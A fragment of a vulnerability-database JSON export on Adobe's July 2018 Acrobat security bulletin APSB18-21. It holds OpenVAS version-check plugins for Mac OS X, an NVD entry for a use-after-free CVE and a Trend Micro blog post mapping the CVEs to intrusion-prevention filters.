12 Jul 2018)\");\n script_name(\"Adobe Acrobat 2017 Multiple Vulnerabilities-apsb18-21 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat 2017\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A double free error.\n\n - Multiple heap overflow errors.\n\n - Multiple use-after-free errors.\n\n - Multiple out-of-bounds write errors.\n\n - A security bypass error.\n\n - Multiple out-of-bounds read errors.\n\n - Multiple type confusion errors.\n\n - An untrusted pointer dereference error.\n\n - MUltiple buffer errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to gain escalated privileges, disclose sensitive information,\n execute arbitrary code on affected system and take control of the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat 2017.011.30080 and earlier\n versions on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat 2017 version\n 2017.011.30096 or later. For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Acrobat/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n##2017.011.30096 == 17.011.30096\nif(version_in_range(version:vers, test_version:\"17.0\", test_version2:\"17.011.30095\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2017.011.30096\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-26T14:35:22", "references": ["https://helpx.adobe.com/security/products/acrobat/apsb18-21.html", "https://helpx.adobe.com"], "pluginID": "1361412562310813668", "description": "This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-07-12T00:00:00", "title": "Adobe Acrobat DC (Classic Track) Multiple Vulnerabilities-apsb18-21 (Mac OS X)", "type": "openvas", "enchantments": {"score": {"modified": "2018-10-26T14:35:22", "vector": "NONE", "value": 7.5}}, "naslFamily": "General", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5025", "CVE-2018-12803", "CVE-2018-12776", "CVE-2018-5011", "CVE-2018-5067", "CVE-2018-12784", "CVE-2018-5061", "CVE-2018-5031", "CVE-2018-5047", "CVE-2018-5020", "CVE-2018-12754", "CVE-2018-5033", "CVE-2018-12757", "CVE-2018-5065", "CVE-2018-5054", "CVE-2018-12802", "CVE-2018-12761", "CVE-2018-5010", "CVE-2018-5036", "CVE-2018-5024", "CVE-2018-5048", "CVE-2018-5018", "CVE-2018-5034", "CVE-2018-5028", "CVE-2018-12779", "CVE-2018-12783", "CVE-2018-5051", "CVE-2018-5052", "CVE-2018-12781", "CVE-2018-5044", "CVE-2018-5014", "CVE-2018-12760", "CVE-2018-12798", "CVE-2018-5043", "CVE-2018-5050", "CVE-2018-5070", "CVE-2018-5058", "CVE-2018-5063", "CVE-2018-5066", "CVE-2018-5042", "CVE-2018-12787", "CVE-2018-5019", "CVE-2018-5046", "CVE-2018-5027", "CVE-2018-5041", "CVE-2018-5068", "CVE-2018-5045", "CVE-2018-12777", "CVE-2018-5069", "CVE-2018-12794", "CVE-2018-5055", "CVE-2018-5021", "CVE-2018-5062", "CVE-2018-12765", "CVE-2018-5009", "CVE-2018-5039", "CVE-2018-12774", "CVE-2018-12790", "CVE-2018-12782", "CVE-2018-12771", "CVE-2018-12793", "CVE-2018-12762", "CVE-2018-12763", "CVE-2018-5035", "CVE-2018-5056", "CVE-2018-5032", "CVE-2018-12780", "CVE-2018-12788", "CVE-2018-5015", "CVE-2018-5017", "CVE-2018-12766", "CVE-2018-5016", "CVE-2018-12785", "CVE-2018-12796", "CVE-2018-12764", "CVE-2018-12770", "CVE-2018-12756", "CVE-2018-12792", "CVE-2018-5030", "CVE-2018-5038", "CVE-2018-12797", "CVE-2018-5026", "CVE-2018-5023", "CVE-2018-5049", "CVE-2018-12768", "CVE-2018-5040", "CVE-2018-12755", "CVE-2018-5029", "CVE-2018-12789", "CVE-2018-5057", "CVE-2018-12767", "CVE-2018-12791", "CVE-2018-5064", "CVE-2018-5012", "CVE-2018-5022", "CVE-2018-12758", "CVE-2018-12773", "CVE-2018-5060", "CVE-2018-12786", "CVE-2018-12772", "CVE-2018-5059", "CVE-2018-12795", "CVE-2018-5037", "CVE-2018-5053"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310813668", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813668", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_acrobat_dc_classic_apsb18-21_macosx.nasl 12116 2018-10-26 10:01:35Z mmartin $\n#\n# Adobe Acrobat DC (Classic Track) Multiple Vulnerabilities-apsb18-21 (Mac OS X)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:acrobat_dc_classic\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813668\");\n script_version(\"$Revision: 12116 $\");\n script_cve_id(\"CVE-2018-12782\", \"CVE-2018-5015\", \"CVE-2018-5028\", \"CVE-2018-5032\",\n \"CVE-2018-5036\", \"CVE-2018-5038\", \"CVE-2018-5040\", \"CVE-2018-5041\",\n \"CVE-2018-5045\", \"CVE-2018-5052\", \"CVE-2018-5058\", \"CVE-2018-5067\",\n \"CVE-2018-12785\", \"CVE-2018-12788\", \"CVE-2018-12798\", \"CVE-2018-5009\",\n \"CVE-2018-5011\", \"CVE-2018-5065\", \"CVE-2018-12756\", \"CVE-2018-12770\",\n \"CVE-2018-12772\", \"CVE-2018-12773\", \"CVE-2018-12776\", \"CVE-2018-12783\",\n \"CVE-2018-12791\", \"CVE-2018-12792\", \"CVE-2018-12796\", \"CVE-2018-12797\",\n \"CVE-2018-5020\", \"CVE-2018-5021\", \"CVE-2018-5042\", \"CVE-2018-5059\",\n \"CVE-2018-5064\", \"CVE-2018-5069\", \"CVE-2018-5070\", \"CVE-2018-12754\",\n \"CVE-2018-12755\", \"CVE-2018-12758\", \"CVE-2018-12760\", \"CVE-2018-12771\",\n \"CVE-2018-12787\", \"CVE-2018-12802\", \"CVE-2018-5010\", \"CVE-2018-12803\",\n \"CVE-2018-5014\", \"CVE-2018-5016\", \"CVE-2018-5017\", \"CVE-2018-5018\",\n \"CVE-2018-5019\", \"CVE-2018-5022\", \"CVE-2018-5023\", \"CVE-2018-5024\",\n \"CVE-2018-5025\", \"CVE-2018-5026\", \"CVE-2018-5027\", \"CVE-2018-5029\",\n \"CVE-2018-5031\", \"CVE-2018-5033\", \"CVE-2018-5035\", \"CVE-2018-5039\",\n \"CVE-2018-5044\", \"CVE-2018-5046\", \"CVE-2018-5047\", \"CVE-2018-5048\",\n \"CVE-2018-5049\", \"CVE-2018-5050\", \"CVE-2018-5051\", \"CVE-2018-5053\",\n \"CVE-2018-5054\", \"CVE-2018-5055\", \"CVE-2018-5056\", \"CVE-2018-5060\",\n \"CVE-2018-5061\", \"CVE-2018-5062\", \"CVE-2018-5063\", \"CVE-2018-5066\",\n \"CVE-2018-5068\", \"CVE-2018-12757\", \"CVE-2018-12761\", \"CVE-2018-12762\",\n \"CVE-2018-12763\", \"CVE-2018-12764\", \"CVE-2018-12765\", \"CVE-2018-12766\",\n \"CVE-2018-12767\", \"CVE-2018-12768\", \"CVE-2018-12774\", \"CVE-2018-12777\",\n \"CVE-2018-12779\", \"CVE-2018-12780\", \"CVE-2018-12781\", \"CVE-2018-12786\",\n \"CVE-2018-12789\", \"CVE-2018-12790\", \"CVE-2018-12795\", \"CVE-2018-5057\",\n \"CVE-2018-12793\", \"CVE-2018-12794\", \"CVE-2018-5012\", \"CVE-2018-5030\",\n \"CVE-2018-5034\", \"CVE-2018-5037\", \"CVE-2018-5043\", \"CVE-2018-12784\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 12:01:35 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-12 13:11:59 +0530 (Thu, 12 Jul 2018)\");\n script_name(\"Adobe Acrobat DC (Classic Track) Multiple Vulnerabilities-apsb18-21 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Acrobat DC\n (Classic Track) and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - A double free error.\n\n - Multiple heap overflow errors.\n\n - Multiple use-after-free errors.\n\n - Multiple out-of-bounds write errors.\n\n - A security bypass error.\n\n - Multiple out-of-bounds read errors.\n\n - Multiple type confusion errors.\n\n - An untrusted pointer dereference error.\n\n - MUltiple buffer errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to gain escalated privileges, disclose sensitive information,\n execute arbitrary code on affected system and take control of the affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Acrobat DC (Classic Track)\n 2015.006.30418 and earlier versions on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Acrobat DC (Classic Track)\n version 2015.006.30434 or later.\n For updates refer to Reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb18-21.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_acrobat_dc_classic_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/AcrobatDC/Classic/MacOSX/Version\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n##2015.006.30434 == 15.006.30434\nif(version_is_less(version:vers, test_version:\"15.006.30434\"))\n{\n report = report_fixed_ver(installed_version:vers, fixed_version:\"2015.006.30434\", install_path:path);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2018-12-04T11:26:20", "references": ["http://www.securitytracker.com/id/1041250", "https://helpx.adobe.com/security/products/acrobat/apsb18-21.html", "http://www.securityfocus.com/bid/104701"], "description": "Adobe Acrobat and Reader 2018.011.20040 and earlier, 2017.011.30080 and earlier, and 2015.006.30418 and earlier versions have a Use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution in the context of the current user.", "edition": 5, "reporter": "NVD", "published": "2018-07-20T15:29:01", "title": "CVE-2018-12773", "type": "cve", "enchantments": {"score": {"modified": "2018-12-04T11:26:20", "vector": "NONE", "value": 9.3}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-12773"], "scanner": [], "modified": "2018-09-14T11:08:21", "cpe": ["cpe:/a:adobe:acrobat_reader_dc:15.006.30352::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.006.30119::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30094::~~classic~~~", "cpe:/a:adobe:acrobat_dc:17.012.20095::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.009.20069::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.006.30394::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.006.30279::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30243::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30392::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.010.20060::~~continuous~~~", "cpe:/a:adobe:acrobat:17.011.30059::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:18.009.20044::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:17.009.20058::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30173::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.006.30243::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.017.20053::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:17.009.20044::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30306::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.006.30355::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30355::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.006.30094::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.009.20071::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.008.20082::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.010.20056::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.006.30121::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.016.20045::~~continuous~~~", "cpe:/a:adobe:acrobat_reader:17.011.30059::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.009.20071::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.009.20077::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.009.20069::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.008.20082::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30280::~~classic~~~", "cpe:/a:adobe:acrobat:17.011.30065::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.020.20042::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30201::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.006.30280::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.017.20050::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.006.30392::~~classic~~~", "cpe:/a:adobe:acrobat_dc:18.009.20050::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.006.30097::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30172::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.017.20053::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.023.20056::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.016.20041::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:18.009.20044::~~continuous~~~", "cpe:/a:adobe:acrobat:17.011.30070::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.023.20070::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:17.012.20096::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:17.012.20093::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30096::~~classic~~~", "cpe:/a:adobe:acrobat_dc:17.012.20098::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:17.012.20093::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.016.20045::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.016.20039::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.020.20039::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.009.20079::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.006.30060::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.010.20059::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:17.009.20058::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.016.20041::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30354::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.010.20060::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30244::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.006.30172::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.006.30096::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30119::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30121::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.023.20053::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.006.30352::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.023.20056::~~continuous~~~", "cpe:/a:adobe:acrobat:17.011.30068::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.016.20039::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.020.20042::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30198::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.006.30174::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.009.20077::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.020.20039::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.009.20079::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:17.009.20044::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.017.20050::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30279::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:18.009.20050::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.006.30354::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.023.20053::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.006.30306::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.006.30173::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:17.012.20098::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.006.30198::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.010.20056::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.023.20070::~~continuous~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30174::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30097::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:17.012.20095::~~continuous~~~", "cpe:/a:adobe:acrobat_dc:15.006.30201::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30060::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.006.30244::~~classic~~~", "cpe:/a:adobe:acrobat_reader_dc:15.006.30394::~~classic~~~", "cpe:/a:adobe:acrobat_dc:15.010.20059::~~continuous~~~"], "id": "CVE-2018-12773", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12773", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "trendmicroblog": [{"lastseen": "2018-07-20T16:56:00", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "\n\nOne night this week, I came across one of my favorite movies Willy Wonka and the Chocolate Factory. The world had gone crazy after the reclusive Willy Wonka announces that he has hidden five golden tickets in chocolate Wonka Bars that promised a factory tour and a lifetime supply of chocolate. There\u2019s a scene at a school where a teacher, Mr. Turkentine, decides to teach the kids about percentages and uses the Wonka Bars as an example. He asks one student how many Wonka Bars she bought and she replied, \u201cAbout a hundred.\u201d Mr. Turkentine tells her that there are ten hundreds in a thousand so that\u2019s 10 percent. He asks a couple of other students and the percentages are easy to figure out. Then he asks Charlie Bucket, a poor paperboy, how many Wonka Bars he bought, and he says \u201cTwo.\u201d Mr. Turkentine replied, \u201cTwo? What do you mean you only opened two? I can\u2019t figure out the percentage for just two, so let\u2019s just pretend you opened two hundred.\u201d\n\nWhile Mr. Turkentine has trouble with percentages, the Zero Day Initiative (ZDI) doesn\u2019t. This month, Adobe had a bigger than normal patch for their Acrobat product, covering 107 CVEs. 68 of those CVEs came through the ZDI program! I don\u2019t have any trouble figuring out that percentage \u2013 that\u2019s 63.6% of the Acrobat vulnerabilities that came through ZDI. The \u201cgolden ticket\u201d for Trend Micro customers isn\u2019t a lifetime of chocolate, but preemptive protection against these bugs!\n\n**MindshaRE: An Introduction to PyKD**\n\nEarlier this week, ZDI researcher Abdul-Aziz Hariri posted a [blog](<https://www.zerodayinitiative.com/blog/2018/7/19/mindshare-an-introduction-to-pykd>) covering the topic of using PyKD to help automate debugging tasks and crash dump analysis using Python. His post is part of the MindshaRE blog series that provides insight on various reversing techniques to security researchers and reverse engineers. The blog demonstrates the installation and basic configuration of PyKD and goes on the show how it can be used to execute Python script from inside WinDBG. You can read the full blog [here](<https://www.zerodayinitiative.com/blog/2018/7/19/mindshare-an-introduction-to-pykd>).\n\n**Adobe Security Update**\n\nThis week\u2019s Digital Vaccine (DV) package includes coverage for Adobe updates released on or before July 10, 2018. The following table maps Digital Vaccine filters to the Microsoft updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [July 2018 Security Update Review](<https://www.zerodayinitiative.com/blog/2018/7/10/the-july-2018-security-update-review>) from the Zero Day Initiative:\n\n**Bulletin #** | **CVE #** | **Digital Vaccine Filter** | **Status** \n---|---|---|--- \nAPSB18-21 | CVE-2018-5009 | 32561 | \nAPSB18-21 | CVE-2018-5010 | 32562 | \nAPSB18-21 | CVE-2018-5011 | 32563 | \nAPSB18-21 | CVE-2018-5012 | 32564 | \nAPSB18-21 | CVE-2018-12799 | 32670 | \nAPSB18-21 | CVE-2018-12803 | 32565 | \nAPSB18-21 | CVE-2018-5014 | 32566 | \nAPSB18-21 | CVE-2018-5015 | 32567 | \nAPSB18-21 | CVE-2018-5016 | 32568 | \nAPSB18-21 | CVE-2018-5017 | 32569 | \nAPSB18-21 | CVE-2018-5018 | 32570 | \nAPSB18-21 | CVE-2018-5019 | 32571 | \nAPSB18-21 | CVE-2018-5020 | 32573 | \nAPSB18-21 | CVE-2018-5021 | 32574 | \nAPSB18-21 | CVE-2018-5022 | 32575 | \nAPSB18-21 | CVE-2018-5023 | 32576 | \nAPSB18-21 | CVE-2018-5024 | 32577 | \nAPSB18-21 | CVE-2018-5025 | 32578 | \nAPSB18-21 | CVE-2018-5026 | 32579 | \nAPSB18-21 | CVE-2018-5027 | 32580 | \nAPSB18-21 | CVE-2018-5028 | 32581 | \nAPSB18-21 | CVE-2018-5029 | 32582 | \nAPSB18-21 | CVE-2018-5030 | 32583 | \nAPSB18-21 | CVE-2018-5031 | 32584 | \nAPSB18-21 | CVE-2018-5032 | 32585 | \nAPSB18-21 | CVE-2018-5033 | 32586 | \nAPSB18-21 | CVE-2018-5034 | 32587 | \nAPSB18-21 | CVE-2018-5035 | 32588 | \nAPSB18-21 | CVE-2018-5036 | 32589 | \nAPSB18-21 | CVE-2018-5037 | 32590 | \nAPSB18-21 | CVE-2018-5038 | 32591 | \nAPSB18-21 | CVE-2018-5039 | 32592 | \nAPSB18-21 | CVE-2018-5040 | 32593 | \nAPSB18-21 | CVE-2018-5041 | 32594 | \nAPSB18-21 | CVE-2018-5042 | 32595 | \nAPSB18-21 | CVE-2018-5043 | 32596 | \nAPSB18-21 | CVE-2018-5044 | 32597 | \nAPSB18-21 | CVE-2018-5045 | 32598 | \nAPSB18-21 | CVE-2018-5046 | 32599 | \nAPSB18-21 | CVE-2018-5047 | 32600 | \nAPSB18-21 | CVE-2018-5048 | 32601 | \nAPSB18-21 | CVE-2018-5049 | 32602 | \nAPSB18-21 | CVE-2018-5050 | 32603 | \nAPSB18-21 | CVE-2018-5051 | 32604 | \nAPSB18-21 | CVE-2018-5052 | 32605 | \nAPSB18-21 | CVE-2018-5053 | 32606 | \nAPSB18-21 | CVE-2018-5054 | 32607 | \nAPSB18-21 | CVE-2018-5055 | 32608 | \nAPSB18-21 | CVE-2018-5056 | 32609 | \nAPSB18-21 | CVE-2018-5057 | 32610 | \nAPSB18-21 | CVE-2018-5058 | 32611 | \nAPSB18-21 | CVE-2018-5059 | 32612 | \nAPSB18-21 | CVE-2018-5060 | 32613 | \nAPSB18-21 | CVE-2018-5061 | 32614 | \nAPSB18-21 | CVE-2018-5062 | 32615 | \nAPSB18-21 | CVE-2018-5063 | 32616 | \nAPSB18-21 | CVE-2018-5064 | 32617 | \nAPSB18-21 | CVE-2018-5065 | 32618 | \nAPSB18-21 | CVE-2018-5066 | 32619 | \nAPSB18-21 | CVE-2018-5067 | 32620 | \nAPSB18-21 | CVE-2018-5068 | 32621 | \nAPSB18-21 | CVE-2018-5069 | 32622 | \nAPSB18-21 | CVE-2018-5070 | 32623 | \nAPSB18-21 | CVE-2018-12754 | 32624 | \nAPSB18-21 | CVE-2018-12755 | 32625 | \nAPSB18-21 | CVE-2018-12756 | 32626 | \nAPSB18-21 | CVE-2018-12757 | 32627 | \nAPSB18-21 | CVE-2018-12758 | 32628 | \nAPSB18-21 | CVE-2018-12760 | 32629 | \nAPSB18-21 | CVE-2018-12761 | 32630 | \nAPSB18-21 | CVE-2018-12762 | 32631 | \nAPSB18-21 | CVE-2018-12763 | 32632 | \nAPSB18-21 | CVE-2018-12764 | 32633 | \nAPSB18-21 | CVE-2018-12765 | 32634 | \nAPSB18-21 | CVE-2018-12766 | 32635 | \nAPSB18-21 | CVE-2018-12767 | 32636 | \nAPSB18-21 | CVE-2018-12768 | 32637 | \nAPSB18-21 | CVE-2018-12770 | 32638 | \nAPSB18-21 | CVE-2018-12771 | 32639 | \nAPSB18-21 | CVE-2018-12772 | 32640 | \nAPSB18-21 | CVE-2018-12773 | 32641 | \nAPSB18-21 | CVE-2018-12774 | 32642 | \nAPSB18-21 | CVE-2018-12776 | 32643 | \nAPSB18-21 | CVE-2018-12777 | 32644 | \nAPSB18-21 | CVE-2018-12779 | 32645 | \nAPSB18-21 | CVE-2018-12780 | 32646 | \nAPSB18-21 | CVE-2018-12781 | 32647 | \nAPSB18-21 | CVE-2018-12782 | 32648 | \nAPSB18-21 | CVE-2018-12783 | 32649 | \nAPSB18-21 | CVE-2018-12784 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nAPSB18-21 | CVE-2018-12785 | 32650 | \nAPSB18-21 | CVE-2018-12786 | 32651 | \nAPSB18-21 | CVE-2018-12787 | 32652 | \nAPSB18-21 | CVE-2018-12788 | 32653 | \nAPSB18-21 | CVE-2018-12789 | 32654 | \nAPSB18-21 | CVE-2018-12790 | 32655 | \nAPSB18-21 | CVE-2018-12791 | 32656 | \nAPSB18-21 | CVE-2018-12792 | 32657 | \nAPSB18-21 | CVE-2018-12802 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nAPSB18-21 | CVE-2018-12793 | 32658 | \nAPSB18-21 | CVE-2018-12794 | 32659 | \nAPSB18-21 | CVE-2018-12795 | 32660 | \nAPSB18-21 | CVE-2018-12796 | 32661 | \nAPSB18-21 | CVE-2018-12797 | 32662 | \nAPSB18-21 | CVE-2018-12798 | 32663 | \nAPSB18-24 | CVE-2018-5007 | 32559 | \nAPSB18-24 | CVE-2018-5008 | 32560 | \n \n \n\n**Zero-Day Filters**\n\nThere are no new zero-day filters in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<https://blog.trendmicro.com/zero-day-coverage-update-week-of-july-9-2018/>).\n\nThe post [Zero-Day Coverage Update \u2013 Week of July 16, 2018](<https://blog.trendmicro.com/zero-day-coverage-update-week-of-july-16-2018/>) appeared first on [](<https://blog.trendmicro.com>).", "reporter": "Elisa Lippincott (Global Threat Communications)", "published": "2018-07-20T15:24:42", "type": "trendmicroblog", "title": "Zero-Day Coverage Update \u2013 Week of July 16, 2018", "enchantments": {"score": {"modified": "2018-07-20T16:56:00", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", "cvelist": ["CVE-2018-12754", "CVE-2018-12755", "CVE-2018-12756", "CVE-2018-12757", "CVE-2018-12758", "CVE-2018-12760", "CVE-2018-12761", 